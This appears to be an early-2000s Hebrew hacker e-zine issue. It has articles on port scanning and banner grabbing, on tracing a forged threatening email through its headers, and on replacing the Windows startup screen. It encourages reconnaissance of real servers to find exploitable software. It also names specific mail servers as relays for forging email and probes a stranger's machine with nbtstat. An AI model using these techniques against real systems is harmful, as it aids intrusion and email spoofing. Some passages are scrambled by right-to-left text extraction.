‫ופיזיקאים שהקדישו "באהבה רבה" את הספרים המגעילים שהם כתבו לנשותיהם‬
‫(אני מאוד מצטערת‪ ,‬אבל אם אני הייתי במקומן הם היו עפים מהבית כבר ממזמן)‪,‬‬
‫אז אני לא חושבת שזה מוזר להקדיש את הטקסט הזה לדאגלאס‪ .‬וי לאב יו‪.‬‬
‫טוב‪ ,‬אז בתפריט היום סקאנינג סקאנינג ועוד קצת סקאנינג (תנסו להגיד את זה רצוף)‬
‫כי בכל הטיולים שלי בפורום גיהנום ראיתי הרבה קוראים מסורים שלנו שהתעצבנו ‪-‬‬
‫למה לעזאזל אנחנו לא מלמדים אותם פורט סקנינג‪ .‬אז הנה זה בא‪.‬‬
‫תשבו‪ ,‬תיקחו כוס קולה (אורגינלית) ובואו איתי לעולם המופלא של הפורטים‪.‬‬
‫זה יכול להיות ארוך‪.‬‬
‫חלקכם אולי יודעים חלק מהדברים‪ ,‬אבל סטיק וויז מי‪ ,‬אתם תמיד יכולים ללמוד‬
‫משהו חדש‪.‬‬
‫אז מה זה פורט בכלל? נניח שאתם מתחברים לאינטרנט ופותחים את התיבת אימייל שלכם‪,‬‬
‫בוא נגיד אאוטלוק אקספרס‪ .‬חשבתם פעם מה קורה? המחשב שלכם בעצם מתחבר לאיזשהו‬
‫מקום על גבי השרת של האינטרנט שלכם‪ ,‬ובודק אם יש לכם דואל חדש‪ .‬המקום הזה נקרא‬
‫פורט‪ .‬הפורט של הבדיקת אימייל הוא ‪ ,110‬והפורט של השליחת אימייל הוא ‪.25‬‬
‫בואו ניקח עוד דוגמה‪ :‬אתם פותחים את הדפדפן ואומרים לו להיכנס‬
‫ל ‪ . www.foobar.com‬המחשב שלכם בעצם מתחבר לפורט ‪ 80‬על השרת ‪www.foobar.com‬‬
‫ומציג לכם את התוכן שיש בו‪.‬‬
‫כמו שאתם אולי יודעים‪ ,‬אפשר להתחבר לפורטים ישירות דרך טלנט‪.‬‬
‫זאת אומרת‪ ,‬במקום להגיד לדפדפן שלכם ללכת לאתר ‪, www.foobar.com‬‬
‫אתם לוקחים את הטלנט שלכם ל ‪ www.foobar.com‬פורט ‪.80‬‬
‫אהה‪ ,‬אני רואה את הקוצים מתחילים לצמוח לכם בתחת‪ ,‬אבל מה יצא לנו מזה?‬
‫אם אתם רוצים לפרוץ משהו על הרשת‪ ,‬אתם צריכים קודם אינפורמציה‪.‬‬
‫אתם צריכים לדעת קודם כל‪ ,‬איזה מערכת השרת מריץ‪ ,‬וכל מיני תוכניות שהוא מריץ‪.‬‬
‫ככה אתם רואים איזה חורי אבטחה יש באתר ואיך אתם יכולים לחדור אליו‪.‬‬
‫בואו נעשה ניסיון קטן‪.‬‬

‫תפתחו את טלנט (התחל< חפש< קבצים או תיקיות< ‪ - telnet‬על כונן ‪)c‬‬
‫ותתחברו נניח ל ‪ gehenom.cjb.net‬פורט ‪.80‬‬
‫עכשיו בעצם אתם פותחים את האתר מהטלנט‪ .‬תנסו להקליד משהו‪.‬‬
‫תקבלו הודעת שגיאה כזאת‪:‬‬
‫>!‪<"doctype html public "-//ietf//dtd html 2.0//en‬‬

‫ואז השרת יגיד לכם שהפקודה שהקלדתם לא חוקית‪.‬‬
‫מכאן אנחנו רק יודעים את הגרסה של ה ‪ html‬שהאתר משתמש בה‪,‬‬
‫אז זה לא הכי מועיל לנו‪ .‬אבל יש מקרים שפורט ‪ 80‬מוסר אינפורמציה אחרת‪...‬‬
‫אני אקח כדוגמה אתר שניסיתי אבל בגלל שיש בו מלא חורי אבטחה אני לא רוצה‬
‫שתזיקו לו (אני רוצה להזיק לו לבד ‪ ,) ):‬אז אני אזייף את הכתובת שלו‪.‬‬
‫התחברתי ל ‪( www.foo.org.il‬כתובת מזויפת) פורט ‪ .80‬הקלדתי סתם משהו ואז‬
‫קיבלתי חזרה הודעת שגיאה בסגנון‪:‬‬
‫‪microsoft iis 4.0 : command not recognized‬‬
‫הו‪-‬פה! הפורט מודיע לי חגיגית שהאתר מריץ ‪ ms iis‬שזו תוכנה של מייקרוסופט‬
‫לניהול ואחזקת אתרים‪ .‬ויש כלל בעולם ההאקינג‪ :‬אם זה מייקרוסופט‪ ,‬שום דבר לא‬
‫בטוח‪ .‬בדברים של מייקרוסופט יש מיליוני חורי אבטחה‪ .‬אם אתם מוצאים אתר‬
‫שמריץ ‪ iis‬לדוגמה‪ ,‬לכו לחפש אקספלוייטים של ‪ iis‬ותגלו שלא קשה לפרוץ אותו‪.‬‬
‫על אותו אתר‪ ,‬לקחתי את טלנט לפורט ‪ .21‬זהו הפורט של ה ‪ ftp‬שזה שרת קבצים‬
‫שמאפשר לכם להיכנס ולהוריד ולהעלות (רק אם יש לכם ‪ account‬שם) קבצים לשרת‪.‬‬
‫טלנט מודיעה לי‪ microsoft ftp :‬ואין מאושרת ממני‪ .‬בשביל ימים כאלה כיף‬
‫לקום בבוקר‪): .‬‬
‫אבל נעזוב את זה עכשיו‪ ,‬כי רק על ‪ iis‬ו ‪ ftp‬אפשר לכתוב מדריך שלם‪.‬‬
‫טלנטו לפורט ‪ 21‬על ‪ .netvision.net.il‬יפתח לכם שרת ה ‪.ftp‬‬

‫הקלידו ‪user anonymous‬‬
‫השרת יגיד משהו בסגנון "אוקי‪ ,‬רק תנו לי את האימייל שלכם בתור סיסמה"‬
‫‪pass fuck@you.com‬‬
‫ותקבלו משהו בסגנון‪user logged in :‬‬
‫כמעט על כל שרת ‪ ftp‬יש חשבון (‪ )account‬בשם אנונימוס שנותן לכם להיכנס ללא‬
‫צורך בסיסמה‪ .‬ברוב המקרים זה לא הכי יעזור לכם לפרוץ את השרת אבל לפחות אתם‬
‫יכולים להסתכל על כמה ספריות שם ולהוריד קבצים במקרים טובים‪ .‬אבל יש גם מקרים‬
‫אחרים‪ ...‬שוב‪ ,‬זה לא טקסט על ‪ ftp‬אז אני לא אפרט‪ .‬תבקשו‪ ,‬אני מבטיחה לכתוב על‬
‫זה משהו‪.‬‬
‫התנתקו מהפורט באלגנטיות (‪ ctrl+f4‬או ‪.)quit‬‬
‫התחברו לפורט ‪ 25‬על‪ ,‬נניח ‪( out.inter.net.il‬אינטרנט זהב)‪ .‬בדקו את השטח‪.‬‬
‫תסתכלו קצת מסביב‪ .‬תפסתם ת'ראש? יופי‪.‬‬
‫עכשיו בחרו לכם אתר משלכם‪ .‬תחקרו אותו‪ ,‬תשיגו עליו את כל האינפורמציה שאתם‬
‫יכולים‪ .‬תבדקו פורטים חשובים כמו‪:‬‬
‫‪ftp - 21‬‬
‫‪ telnet - 23‬אם הפורט הזה פתוח‪,‬‬
‫זה אומר שהשרת נותן למשתמשים שלו ‪.shell account‬‬
‫זה חשבון שנותן למשתמש להריץ פקודות יוניקס על השרת‪,‬‬
‫כאילו המשתמש נמצא ממש מול מערכת יוניקס‪.‬‬
‫אם הספק אינטרנט שלכם פותח את הפורט הזה‪,‬‬
‫נסו להתחבר ולהקליד את שם המשתמש והסיסמה שלכם‪,‬‬
‫ואתם יכולים להריץ כמה פקודות יוניקס חמודות כמו ‪.whois‬‬
‫חבל‪ ,‬אבל כל ספקי האינטרנט בישראל שאני יודעת עליהם חסמו את הפורט הזה‪.‬‬
‫‪ - 25‬כתיבת אימייל‬
‫‪ finger - 79‬זה פורט שאם הוא פתוח‪ ,‬אתם יכולים להיות מאושרים‪ .‬מאוד מאושרים‪.‬‬
‫דרך הפורט הזה אפשר להשיג אינפורמציה על משתמשים על הספק‪.‬‬
‫נסו להקליד ‪ finger root‬או אפילו סתם ‪ root‬לדוגמה‪,‬‬
‫כדי לקבל טינפו על המשתמש ‪.root‬‬
‫לפעמים אתם תוכלו לראות גם איזה משתמשים מחוברים כרגע על השרת ‪.‬‬
‫רגע‪ ,‬אם התוכנית הנחמדה ‪ finger‬יכולה להגיד לנו כלמיני דברים על כלמיני‬
‫משתמשים זה אומר שהיא יכולה לגשת לחשבונות (‪ )accounts‬של אותם משתמשים!‬
‫וזה אומר שיש לה גם גישה למשתמש העל‪ !!)root( ..‬לפעמים אם מקלידים משהו מוזר‬
‫בפורט הזה לדוגמה ‪ sjjh\\\\||###$^%$^$^%$‬התוכנית יכולה להשתגע ו"להפיל"‬
‫אתכם ישר לתוך החשבון של ה ‪ ...root‬אבל אל תתלהבו‪ ,‬זה מאוד מאוד נדיר‪.‬‬
‫וגם רוב השרתים חוסמים את הפורט הזה כי הוא מאוד עוזר לנו‪): ...‬‬
‫‪ .http - 80‬יענתו אתרים‪ ,‬נו‪ ,‬אתם יודעים‪.‬‬
‫‪ - 110‬קריאת אימייל‪.‬‬
‫‪ - 139‬שיתוף! ייאה!‬
‫את הרשימה השלמה של הפורטים הידועים תוכלו להשיג ב ‪rfc 1700‬‬

‫(פשוט חפשו אותו) או בכל מיני מסמכים (חפשו ‪ port list‬או משהו כזה)‪.‬‬
‫פורטים ידועים הם מ‪ 1-‬עד ‪ 1024‬אם אני זוכרת נכון‪ .‬אלה פורטים סטנדרטיים‪,‬‬
‫זאת אומרת שעל כל שרת פורט ‪ 25‬משמש לאימייל‪ ,‬פורט ‪ 80‬לאתר וכדומה‪.‬‬
‫פורטים מעל הערך הזה הם פורטים מוזרים יותר‪): .‬‬
‫אם אתם רוצים לראות איזה פורטים פתוחים תורידו פורט סקאנר‬
‫(או תבנו לבד‪ ,‬זה לקח לי בדיוק ‪ 5‬דקות) ותריצו סריקה‪ .‬הסקאנר יחזיר לכם את‬
‫מספרי הפורטים הפתוחים‪ .‬בכל זאת‪ ,‬עדיף גם לסרוק ידנית כי ככה אתם משיגים‬
‫יותר אינפו‪.‬‬
‫כשאתם מצליחים להתחבר לפורט מסויים‪ ,‬שימו לב לאיך שהוא מקבל אתכם‪.‬‬
‫בד"כ הוא יכתוב את השם של השרת או התוכנה שהוא מריץ או‬
‫כלמיני פרטים אחרים עליו‪ .‬ככה תדעו איך לפרוץ אותו‪.‬‬
‫אל תזלזלו בהודעות שגיאה‪ .‬הן יכולות לתת הרבה מאוד‪ .‬תקראו אותן‪.‬‬
‫דבר ראשון כשאתם מצליחים להתחבר לפורט‪ :‬נסו לקבל עזרה‪.‬‬
‫הקלידו ‪ .help‬אם זה לא עוזר תנסו ? או ‪ . man‬פורטים גבוהים יותר או כאלה שיש‬
‫להם הרבה בעיות מגינים על עצמם בזה שהם לא מסכימים לתת עזרה‪ .‬וזה די מעצבן‪.‬‬
‫הערה‪ :‬כשאתם מתחברים לפורט‪ ,‬השרת מריץ ‪ daemon‬שזאת תוכנה שמאזינה לאותו פורט‬
‫ומגיבה לקלט מסויים ממכם‪ .‬סתם לידע כללי‪ ,‬אם תתקלו במושג הזה‪.‬‬
‫טיפ אחרון‪ :‬רוצים לראות איזה פורטים פתוחים אצלכם? פתחו את חלון דוס (‪,)ms dos‬‬
‫והקלידו‪:‬‬
‫‪netstat -a‬‬
‫ככה תראו את כל השרתים שאתם מחוברים אליהם‪ ,‬שליד כל אתר כתוב הפורט שאליו‬
‫אתם מחוברים‪ .‬מן הסתם תראו שם גם את ספק האינטרנט שלכם ואתרים שאתם מחוברים‬
‫אליהם באותו הרגע‪.‬‬
‫וגם אנשים שאתם מדברים אייתם באייסיקיו או במירק באותו הרגע‪ ): .‬הא הא‪.‬‬
‫אם כתוב ליד הפורט ‪ established‬זה אומר שהפורט פתוח על השרת ומחכה לפקודות‬
‫ממכם (נניח אתר שמחכה לקלט ממכם) ואם כתוב ‪ listening‬הפורט פתוח אצלכם ומאזין‬
‫למשהו‪ .‬כמו למשתמש אייסיקיו אחר שאתם מדברים אייתו באותו רגע‪.‬‬
‫אה‪ ,‬ואם אתם רואים שפורט ‪ 31337‬פתוח אצלכם אז אכלתם אותה‪,‬‬
‫יש עליכם טרויאני (‪)))): .)back orifice‬‬
‫יש הרבה נושאים כאן כמו פקודות ‪ ftp‬ודוס שלא פירטתי עליהם כי אני לא רוצה‬
‫להתיש אתכם לגמרי וגם כי אני כבר די מותשת‪ .‬יאללה נמאס לי‬
‫‪have fun‬‬
‫‪i love you‬‬
‫‪always‬‬
‫שלכם‬
‫הבנת כותרות ‪e-mail‬‬
‫"‪"all in all is all we are‬‬

‫(‪)kurt cobain‬‬
‫שיעור שני באינפורמציה בגיליון‪ :‬היום נלמד על‬

‫כותרות אימייל ואיך להשיג מידע דרכן‪ ,‬וגם נשחק קצת עם כל מיני מחשבים בדרך‪.‬‬
‫טוב‪ ,‬הסיפור הוא כזה‪:‬‬
‫יום העצמאות‪ ,‬היה לי ערב מעצבן ולא כייפי אז מסטלתי את עצמי עם מוזיקה‪.‬‬
‫אני חוזרת מ"סוטול" של ‪ 2‬אלבומים של מרילין מנסון (תאמינו לי זה יכול להקפיא‬
‫את המוח לבנאדם הכי שפוי‪ ,)..‬מתחברת לאינטרנט‪ ,‬בודקת אימייל‪ ,‬ובום חוזרת‬
‫למציאות במכה‪:‬‬
‫‪from: 1@walla.co.il‬‬
‫‪subject: icq email message‬‬
‫‪date: april 6, 2000 12:03:22 pm edt‬‬
‫אתר גיהינום אתר מדליק אך כאשר אחד ממכם מפרסם חשבונות‬

‫בנקים של אחרים זה מבחיל ועובר את כל גבול הטעם הטוב!‬
‫התביישו לכם‪ ,‬מי אתם?‬

‫מי אתם שתפרסמו חשבונות בנקים‪ ,‬הבעיה שלכם שאתם לא ועמלים בשביל הכסף‪.‬‬
‫אין לכם ערך לכסף!!!‬

‫עוד מסמך כזה יפורסם הוא יעבור למשטרה‬
‫ודבר נוסף אם חשבון שאיכשהו קרוב אלי‬
‫אני אדאג שאתרכם יהופך שמיים וארץ!‬
‫דמכם בראשכם‪ ,‬יש לנו קשרים‬

‫ואישית אם ניתפס אחד מכם אם לא תורידו מסמך זה יפגע קשות‬
‫אתם עכשיו לא בטוחים‪ ,‬אתם עוסקים באש!!!‬
‫‪----------------------------------‬‬
‫‪download icq at http://www.icq.com‬‬
‫ת'אמת? די נבהלתי בהתחלה‪ .‬אבל אח"כ חטפתי קריזה ‪ -‬מה זה האיומים האלה?‬
‫תראו‪ ,‬גם אני נגד לפרסם חשבונות בנקים‪ ,‬אבל לאיים ככה על בחורה תמימה וצדיקה‬
‫כמוני?!?!‬
‫אוקי‪ ..‬מה עכשיו? מן הסתם זה אימייל מזויף‪ .‬בואו נראה מה אנחנו יכולים לגלות‬
‫עליו‪ .‬בשביל זה אנחנו צריכים לראות את כל הכותרת (‪ )header‬של האימייל‪.‬‬
‫באימייל‪.‬קום עושים את זה ע"י זה שלוחצים על הלינק‪:‬‬
‫‪show all headers‬‬
‫באאטלוק אקספרס לדוגמה‪ ,‬עושים את זה ע"י לחיצה ימנית על ההודעה ואז בחירה‬
‫ב"מאפיינים"‪ ,‬כרטיסיית "פרטים"‪.‬‬
‫ב ‪ eudora‬רואים את כל הכותרת ע"י לחיצה על הכפתור "‪): ."blah blah blah‬‬
‫אז מכיוון שקראתי את ההודעה דרך אימייל‪.‬קום לחצתי על הלינק וזה מה שקיבלתי‪:‬‬
‫| ‪show all headers‬‬

‫‪subject: icq email message‬‬
‫‪date: april 6, 2000 12:03:22 pm edt‬‬
‫‪to: zarquon@email.com add to address book‬‬
‫‪:cc‬‬
‫‪<return-path <1@walla.co.il‬‬
received from smv347-ec.mail.com by ida437-ec.mail.com )version 1.11( for
)<zarquon@email.com>; tue, 24 apr 2001 08:17:27 -0400 )edt
received from mailgw2.netvision.net.il )mailgw2.netvision.net.il [194.90.1.9]( by smv347-
ec.mail.com )8.9.3/8.9.1smv070400( with esmtp id iaa16497 for <zarquon@email.com>
)sent by <1@walla.co.il>; tue, 24 apr 2001 08:17:26 -0400 )edt
received from walla.co.il )ras4-p2.jlm.netvision.net.il [62.0.147.2]( by
mailgw2.netvision.net.il )8.9.3/8.9.3( with smtp id paa26992 for <zarquon@email.com>;
)tue, 24 apr 2001 15:19:01 +0300 )idt
<message-id <200104241219.paa26992@mailgw2.netvision.net.il
mime-version 1.0
"content-type text/plain; charset="iso-8859-1
content-transfer-encoding base64
x-mime-autoconverted from 8bit to base64 by smv347-ec.mail.com id iaa16497
x-delivery mail.com ida 1.11
...‫אווו מה כל השטויות האלה? בוא נבדוק שורה שורה‬
received from smv347-ec.mail.com by ida437-ec.mail.com )version 1.11( for

)<zarquon@email.com>; tue, 24 apr 2001 08:17:27 -0400 )edt
‫ קיבל את האימייל משרת‬smv347-ec.mail.com ‫זה אומר ששרת אימייל בשם‬

,mail.com ‫ שניהם נמצאים על‬,‫ שימו לב‬. ida437-ec.mail.com ‫בשם‬
‫ השערה שלי? אלה השרתים‬.‫או במילים אחרות שניהם נמצאים על אותה רשת‬
‫קום ולכן הם לא כ"כ מעניינים אותנו כי אנחנו רוצים לדעת מאיפה‬.‫של אימייל‬
.‫האימייל הגיע‬
.)version 1.11( ‫שימו לב שמצוין גם התאריך והגרסה של השרת‬
25 ‫ שבטח יש מלא חורי אבטחה על פורט‬,‫ שזה אומר‬...‫?? זה בטח גרסה ישנה‬1.11 ‫רק‬
.‫! אבל נעזוב את זה כרגע‬ida437-ec.mail.com ‫של‬
received from mailgw2.netvision.net.il )mailgw2.netvision.net.il [194.90.1.9]( by smv347-

ec.mail.com )8.9.3/8.9.1smv070400( with esmtp id iaa16497 for <zarquon@email.com>
)sent by <1@walla.co.il>; tue, 24 apr 2001 08:17:26 -0400 )edt
‫קום‬.‫ שלח את האימייל לשרת אימייל‬mailgw2.netvision.net.il ‫זה אומר לנו ששרת בשם‬
‫ כמו שאתם רואים מצוינת הגרסה‬.)smv347-ec.mail.com(
‫) וגם העובדה שהוא‬8.9.3/8.9.1smv070400( ‫שהשרת מריץ‬
.estmp ‫משתמש בפרוטוקול אימייל‬
id )iaa16497( - ‫האי יפי בסוגריים הוא האי יפי של שרת האימייל וה‬
.‫זה מספר זהות שניתן לכל אימייל שנשלח‬
. mailgw2.netvision.net.il ‫אני מתחילה לשער שהאימייל נשלח במקור דרך השרת‬
:‫בואו נבדוק את השורה הבאה‬
received from walla.co.il )ras4-p2.jlm.netvision.net.il [62.0.147.2]( by

mailgw2.netvision.net.il )8.9.3/8.9.3( with smtp id paa26992 for <zarquon@email.com>;
)tue, 24 apr 2001 15:19:01 +0300 )idt
<message-id <200104241219.paa26992@mailgw2.netvision.net.il
‫ הוא זה‬walla.co.il ‫ נראה כאילו‬,‫אווווווו! תראו מה יש לנו פה!! במבט ראשון‬

:‫ל בסוגריים כתובה הכתובת האמיתית ממנה נשלח האימייל‬-‫ב‬-‫ א‬..‫ששלח את האימייל‬
ras4-p2.jlm.netvision.net.il
[62.0.147.2]
!!!
‫שימו לב שבאמייל אמיתי לא יגידו לכם שהאימייל התקבל משרת אחד אבל יכתבו‬
‫בסוגריים כתובת אחרת‪...‬‬
‫מישהו מהאי יפי הזה שלח אימייל דרך ‪ mailgw2.netvision.net.il‬אלי‪.‬‬
‫מישהו מסביבות ירושלים‪ ,‬כי כתוב ‪.jlm‬‬
‫והנה הדבר הכי חשוב פה‪:‬‬
‫‪<message-id <200104241219.paa26992@mailgw2.netvision.net.il‬‬
‫לכל אימייל שנשלח דרך שרת כלשהוא (במקרה שלנו ‪)mailgw2.netvision.net.il‬‬
‫יש מספר זהות מיוחד (‪ .)id‬ככה המנהל יכול לבדוק בדיוק מי שלח‪ ,‬לאן וכולי‪.‬‬
‫הספרות שלפני הנקודה מציינות תאריך‪ .200104241219 :‬שזה אומר ‪24/04/2001‬‬
‫בשעה ‪.12:19‬‬
‫הספרות שאחרי הנקודה הן מספר הזהות המיוחד של האימייל‪.‬‬
‫רגע! כתוב פה שזה נשלח ב‪ 24‬באפריל! אבל באימייל עצמו היה כתוב ה‪ 6-‬באפריל!‬
‫ולא רק זה‪ ,‬גיליון ‪ 5‬יצא רק ב‪ 20‬ומשהו באפריל‪ .‬הנה עוד הוכחה שהאימייל מזויף‪.‬‬
‫ולא רק זה‪ ,‬אלא גם התאריך מזויף‪ .‬למה שמישהו ירצה לזייף תאריך?‬
‫אל תשאלו אותי‪...‬‬
‫בכל זאת‪ ,‬עדיין היו לי ספקות‪ ,‬ולכן החלטתי לוודא שהוא באמת מזויף‪.‬‬
‫לפי הכותרת אנחנו יודעים שהוא נשלח מנטוויז'ן ‪,mailgw2.netvision.net.il -‬‬
‫אבל כתוב שהוא נשלח מ‪ .walla.co.il‬אז הלכתי לאתר של נטוויז'ן וראיתי שהם‬
‫ממליצים על מנוע החיפוש נענע שהוא למיטב ידיעתי המתחרה של וואלה ולכן לא‬
‫הגיוני שואללה יושבים על נטוויז'ן‪ .‬סתם בשביל הכיף נכנסתי גם לואללה‪ ,‬פתחתי‬
‫חלון דוס והקלדתי‪:‬‬
‫‪tracert www.walla.co.il‬‬
‫וזה מה שקיבלתי‪...‬‬
‫‪ms 261 ms 275 ms diup-202-6.inter.net.il [213.8.202.6 257‬‬ ‫[‪1‬‬

‫‪ms 261 ms 275 ms diup-202-1.inter.net.il [213.8.202.1 253‬‬ ‫[‪2‬‬
‫‪ms 392 ms 327 ms 213.8.8.153 266‬‬ ‫‪3‬‬
‫‪ms 273 ms 261 ms 192.116.202.158 267‬‬ ‫‪4‬‬
‫‪ms 274 ms 274 ms 192.117.159.22 252‬‬ ‫‪5‬‬
‫* ‪request timed out‬‬ ‫*‬ ‫*‬ ‫‪6.‬‬
‫* ‪request timed out‬‬ ‫*‬ ‫*‬ ‫‪7.‬‬
‫‪8‬‬
‫הפקודה ‪ tracert‬בודקת באיזה נתיבים עובר המידע שנשלח לואללה‪ ,‬זאת אומרת דרך‬
‫איזה מחשבים‪ .‬שתי השורות הראשונות קשורות למחשב שלי (אינטרנט זהב)‪.‬‬
‫לא מצאתי שם שום דבר שקשור איכשהוא לנטוויז'ן‪ .‬סתם בשביל ידע כללי‪,‬‬
‫שימו לב שהמידע עובר דרך עוד ‪ 2‬מחשבים שנמצאים על אינטרנט זהב ‪ -‬מכיוון ששני‬
‫איי‪-‬פיים מתחילים ב‪ .213.8.202 -‬אחד מהם הוא מן הסתם האייפי שלי אז זה אומר‬
‫שעוד מחשב על אינטרנט זהב מקבל את הנתונים לפני שהוא שולח לי‪ .‬עוד השערה ‪-‬‬
‫וואלה נמצא על שרת נפרד‪ ,‬לא קשור לשום דבר ובטח שלא לנטוויז'ן‪.‬‬
‫טוב‪ ,‬אז מה עושים?‬
‫יש לנו את הכתובת שממנה האימייל נשלח‪ .‬א‪-‬ב‪-‬ל אחרי בירור קצר גיליתי שנטויז'ן‬
‫לא נותנות אייפיים סטטיים (זאת אומרת אייפיים קבועים‪ ,‬כמו שיש לאתרים)‪ ,‬ואז‬
‫כל פעם שמתחברים מקבלים אייפי אחר‪.‬‬
‫אז כמו שאמרתי לכם‪ ,‬על כל שרת מייל כמעט יש רישום של הודעות שנשלחו מאותו שרת‪.‬‬
‫המנהל של השרת יכול לבדוק ולדעת בדיוק מי שלח מאיפה וכולי‪.‬‬
‫שלחתי אימייל ל‪ abuse@netvision.net.il‬וביקשתי מהם שיתנו לי את כתובת האימייל‬
‫האמיתית של מי ששלח בתאריך ‪ 24.4.2001‬מהאייפי ‪ 62.0.147.2‬הודעה עם מספר‬
‫זהות ‪ .paa26992‬הם ענו שבלי צו של בית משפט הם לא יכולים למסור לי שום פרטים‬
‫על חשבונות של אנשים‪(: .‬‬
‫טוב‪ ...‬מנהל נטויזן הוא היחיד שיכול לברר לי מי זה (האלטרנטיבה היא לפרוץ‬
‫לנטוויז'ן‪ )...‬אז אין מה לעשות‪ .‬אני רק רציתי להתנצל על זה שפירסמנו חשבונות‬
‫בנק‪): ...‬‬
‫סתם בשביל הכיף‪ ,‬טלנטתי ל ‪ mailgw2.netvision.net.il‬ול ‪smv347-ec.mail.com -‬‬

‫פורט ‪ .25‬השרת לא מבקש פקודת זיהוי ‪ !helo‬זה מקל על הזיוף‪.‬‬
‫שרתים די נחמדים האמת‪ ,‬והדבר הכי טוב בהם ‪ -‬הם נותנים לזייף מכל דומיין ניים‬
‫ולכל דומיין ניים‪( .‬יש כאלה שנותנים לזייף רק לכתובות של הדומיין ניימים שלהם)‪.‬‬
‫ניסיתי גם לבדוק מי זה ‪ 62.0.147.2‬שהיה מחובר באותו רגע‬
‫(גיליתי את זה ע"י הפקודה ‪ .)ping‬חקרתי קצת באמצעות ‪ netstat‬ו ‪ nbtstat‬וגיליתי‬
‫מחשב חמוד בשם "ישראל"‪ ,‬שימו לב לזה‪:‬‬
‫‪zero cool c:\windows>nbtstat -a 62.0.147.2‬‬
‫‪netbios remote machine name table‬‬
‫‪name‬‬ ‫‪type‬‬ ‫‪status‬‬

‫‪---------------------------------------------‬‬
‫‪israel‬‬ ‫‪<00> unique registered‬‬
‫‪none‬‬ ‫‪<00> group‬‬ ‫‪registered‬‬
‫‪israel‬‬ ‫‪<03> unique registered‬‬
‫‪mac address = 44-45-53-54-00-00‬‬

‫‪54-00-00‬‬
‫איזה יופי‪ ..‬שיתופים‪ ..‬טוב ממילא זה לא המחשב שרציתי‪.‬‬
‫אז מה כן יצא לנו מהטקסט המבולגן הזה??‬

‫למדנו איך לאתר מקור של אימייל‪ .‬לדעת מאיפה הוא נשלח‪ ,‬האם הוא מזויף וקצת‬
‫פרטים על השולח (אנחנו יודעים שהוא מירושלים‪ ..‬יש‪.)..‬‬
‫שימו לב שאם האייפי ממנו נשלח האימייל היה סטטי היינו יכולים לברר המון‬
‫פרטים על המחשב השולח ואולי גם לפרוץ לשם‪.‬‬
‫למדנו גם לשים לב לגרסאות תוכנה‪ .‬גרסאות ישנות מאוד יכולות להכיל דברים‬
‫מעניינים מאוד לפעמים‪.‬‬
‫למדנו על מספרי זהות של אימיילים‪ ,‬וכן‪ ,‬למדנו שכשאנחנו מזייפים אימייל‬
‫אפשר לעלות עלינו בקלות‪ .‬אם אתם רוצים לזייף טוב‪ ,‬נסו שרתים שונים ובדקו‬
‫את הכותרות כדי לראות מה הכי טוב‪.‬‬
‫הכרנו את הפקודה ‪ tracert‬שתשמש אותנו הרבה כדי לעקוב אחרי העברת מידע‬
‫בין מחשבים‪.‬‬
‫מצאנו שני שרתי אימייל חביבים שיזייפו לנו כל מה שנרצה בחינם וגם מחשב‬
‫בודד בשם ישראל שזקוק לאימוץ‪.‬‬
‫טוב‪ ,‬אז לי היה כיף למרות שלא יצא מזה כלום‪ ,‬לכם היה מעניין אני מקווה‪,‬‬
‫וגם אם לא לפחות למדתם משהו חדש‪.‬‬
‫ביי‪,‬‬
‫"להתראות‪ ,‬שלום‬
‫זה לא נגמר‪ ,‬זה רק הסוף"‬
‫אוהבת תמיד‪,‬‬
‫החלפת מסכי הפעלה‪/‬כיבוי‬
‫"בנאדם לא נולד אהבל‪ ,‬הוא גודל להיות כזה במסגרות ומוסדות כמו של מערכת החינוך בישראל‪".‬‬
‫(גיהנום)‬
‫(*)(*)‬
‫) (‬
‫( )‬
‫נחשו מי או מה אני??‬
‫שלא כמו במערכת לינוקס‪ ,‬מערכת ההפעלה ווינדוס אינה נותנת למשתמש שליטה מלאה‪ ,‬אלא להיפך‪.‬‬
‫אז אולי אתם יכולים להחליף את תמונת הרקע בשולחן העבודה‪ ,‬ולבחור איזה שמות לתת לקבצים‬
‫אבל‬
‫בסופו של דבר כוח השליטה שלכם על מערכת ההפעלה שמותקנת אצלכם במחשב‪ ,‬אפסית‪ .‬היום כל‬
‫זה יישתנה??‬
‫לא‪ .‬אבל אני אלמד אתכם משהו חמוד‪ .‬אצל רובכם‪ ,‬כשאתם מדליקים את המחשב‪ ,‬יש את סמל‬
‫החלונות של ווינדוס‬
‫ומאחוריו רקע כחול‪ .‬למטה כתוב‪:‬‬
‫‪microsoft windows 98‬‬
‫או‬
‫‪microsoft windows 95‬‬
‫חוץ מזה‪ ,‬כשאתם מכבים את המחשב‪ ,‬אז לרובכם המסך שחור‪ ,‬וכתוב משהו כמו‪:‬‬
‫'כעת ניתן לכבות את המחשב' בצבע כתום‪ .‬אני מקווה מאוד שאתם יודעים למה אני מתכוון‪ .‬בכל‬
‫מקרה‪,‬‬
‫לא משנה איך נראים אצלכם מסכי ההפעלה‪/‬כיבוי‪ ,‬היום אתם עומדים לשנות אותם (אם אתם רוצים)‬
‫לאיך‬
‫שאתם רוצים שהם ייראו‪ .‬פיתחו את עורך הגרפיקה האהוב עליכם‪ .‬לא משנה אם זה ‪,paint shot pro‬‬
‫או ‪ photoshop‬או כל דבר אחר‪ .‬אם אתם לא יודעים מה זה עורך גרפיקה או חושבים שאין לכם‪,‬‬
‫תיאלצו‬
‫להשתמש באחד פשוט שמגיע יחד עם מערכת הווינדוס שלכם‪ ,‬הרי זו תוכנת ‪.ms paint‬‬
‫בכדי להפעיל אותה לחצו על התחל ‪ <-‬הפעלה‪...‬‬
‫בחלון שנפתח הקלידו‪:‬‬
‫‪c:\program files\accessories\mspaint.exe‬‬
‫ולחיצו על מקש ה >‪ .<enter‬לא באמת התכוונתי שתקלידו את כל השורה הזאת‪ ,‬סמנו אותה עם‬
‫העכבר ולחיצו‬
‫על ‪ .ctrl + c‬זה ייבצע פעולת העתקה‪ .‬בחלון "הפעלה‪ "...‬לחצו על ‪ .ctrl + v‬זה ייבצע פעולת הדבקה‬
‫וככה תחסכו את כל ההקלדה‪ .‬אז אתם נמצאים בתוך העורך הגרפי שלכם‪ .‬כעת פיתחו את הקובץ‬
‫הבא‪:‬‬
‫‪c:\logo.sys‬‬
‫חשוב שתפתחו אותו בתוך עורך הגרפיקה‪ .‬אם זה לא מצליח לפתוח את הקובץ נסו את‪:‬‬
‫‪c:\ip.sys‬‬
‫כמו שאתם שמים לב יש לפניכם עכשיו את מסך ההפעלה של ווינדוס‪ .‬למה לעזאזל הוא בקובץ‬
‫מערכת???‬
‫(‪).sys‬‬
